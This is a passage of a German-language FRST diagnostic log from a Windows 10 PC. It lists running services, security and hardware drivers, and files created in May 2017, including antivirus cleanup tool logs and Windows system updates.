S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-05-09] ()
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [187320 2017-05-22] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [113592 2017-05-22] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-05-22] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-05-22] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [93624 2017-05-22] (Malwarebytes)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-22 18:29 - 2017-05-22 18:29 - 00005487 _____ C:\Users\Dino\Desktop\Mbam.txt
2017-05-22 18:29 - 2017-05-22 18:29 - 00000000 ___HD C:\OneDriveTemp
2017-05-22 18:25 - 2017-05-22 18:29 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-05-22 18:25 - 2017-05-22 18:29 - 00113592 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-05-22 18:25 - 2017-05-22 18:29 - 00093624 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-05-22 18:25 - 2017-05-22 18:29 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00187320 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\Program Files\Malwarebytes
2017-05-22 18:25 - 2017-05-09 16:37 - 00077440 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-05-22 18:15 - 2017-05-22 18:10 - 04102600 _____ C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
2017-05-22 18:13 - 2017-05-22 18:19 - 00000000 ____D C:\AdwCleaner
2017-05-21 21:26 - 2017-05-21 21:31 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.26.49_log.txt
2017-05-21 21:24 - 2017-05-22 18:36 - 00022170 _____ C:\Users\Dino\Desktop\FRST.txt
2017-05-21 21:24 - 2017-05-22 18:35 - 00049308 _____ C:\Users\Dino\Desktop\Addition.txt
2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt
2017-05-21 21:19 - 2017-05-21 21:04 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe
2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe
2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-22 18:36 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
